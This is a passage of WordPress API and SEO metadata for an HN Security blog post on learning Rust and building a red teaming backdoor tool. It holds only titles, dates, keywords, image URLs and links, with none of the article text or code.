logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/learning-rust-for-fun-and-backdoo-rs\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Learning Rust for fun and backdoo-rs\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\",\"name\":\"HN Security\",\"description\":\"Offensive Security Specialists\",\"publisher\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\",\"name\":\"HN Security\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2026\\\/01\\\/hn-libellula.jpg\",\"contentUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2026\\\/01\\\/hn-libellula.jpg\",\"width\":696,\"height\":696,\"caption\":\"HN Security\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/hnsec\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/hnsecurity\\\/\",\"https:\\\/\\\/github.com\\\/hnsecurity\",\"https:\\\/\\\/infosec.exchange\\\/@hnsec\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/person\\\/89a4174c275f05d6148fb0fdedc8de4f\",\"name\":\"Marco Ivaldi\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"caption\":\"Marco Ivaldi\"},\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/author\\\/marco-ivaldi\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HN Security - Learning Rust for fun and backdoo-rs -","description":"First installment of the Offensive Rust series that introduces learning resources and walks through the implementation of a red teaming tool.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/","og_locale":"it_IT","og_type":"article","og_title":"HN Security - Learning Rust for fun and backdoo-rs -","og_description":"First installment of the Offensive Rust series that introduces learning resources and walks through the implementation of a red teaming tool.","og_url":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/","og_site_name":"HN Security","article_published_time":"2024-09-03T06:07:32+00:00","article_modified_time":"2025-10-21T09:09:49+00:00","og_image":[{"width":1600,"height":836,"url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","type":"image\/jpeg"}],"author":"Marco Ivaldi","twitter_card":"summary_large_image","twitter_creator":"@hnsec","twitter_site":"@hnsec","twitter_misc":{"Scritto da":"Marco Ivaldi","Tempo di lettura stimato":"6 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/#article","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/"},"author":{"name":"Marco Ivaldi","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/89a4174c275f05d6148fb0fdedc8de4f"},"headline":"Learning Rust for fun and backdoo-rs","datePublished":"2024-09-03T06:07:32+00:00","dateModified":"2025-10-21T09:09:49+00:00","mainEntityOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/"},"wordCount":1216,"publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","keywords":["metasploit","meterpreter","tactical exploitation","windows","red teaming","rust"],"articleSection":["Tools","Articles"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/","url":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/","name":"HN Security - Learning Rust for fun and backdoo-rs -","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/#primaryimage"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","datePublished":"2024-09-03T06:07:32+00:00","dateModified":"2025-10-21T09:09:49+00:00","description":"First installment of the Offensive Rust series that introduces learning resources and walks through the implementation of a red teaming tool.","breadcrumb":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/#primaryimage","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","width":1600,"height":836,"caption":"Rust logo"},{"@type":"BreadcrumbList","@id":"https:\/\/hnsecurity.it\/it\/blog\/learning-rust-for-fun-and-backdoo-rs\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hnsecurity.it\/it\/"},{"@type":"ListItem","position":2,"name":"Learning Rust for fun and backdoo-rs"}]},{"@type":"WebSite","@id":"https:\/\/hnsecurity.it\/it\/#website","url":"https:\/\/hnsecurity.it\/it\/","name":"HN Security","description":"Offensive Security Specialists","publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hnsecurity.it\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/hnsecurity.it\/it\/#organization","name":"HN Security","url":"https:\/\/hnsecurity.it\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","width":696,"height":696,"caption":"HN Security"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/hnsec","https:\/\/www.linkedin.com\/company\/hnsecurity\/","https:\/\/github.com\/hnsecurity","https:\/\/infosec.exchange\/@hnsec"]},{"@type":"Person","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/89a4174c275f05d6148fb0fdedc8de4f","name":"Marco Ivaldi","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","caption":"Marco Ivaldi"},"url":"https:\/\/hnsecurity.it\/it\/blog\/author\/marco-ivaldi\/"}]}},"jetpack_featured_media_url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","_links":{"self":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/3336","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/comments?post=3336"}],"version-history":[{"count":4,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/3336\/revisions"}],"predecessor-version":[{"id":161118,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/3336\/revisions\/161118"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media\/159953"}],"wp:attachment":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media?parent=3336"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/categories?post=3336"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/tags?post=3336"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}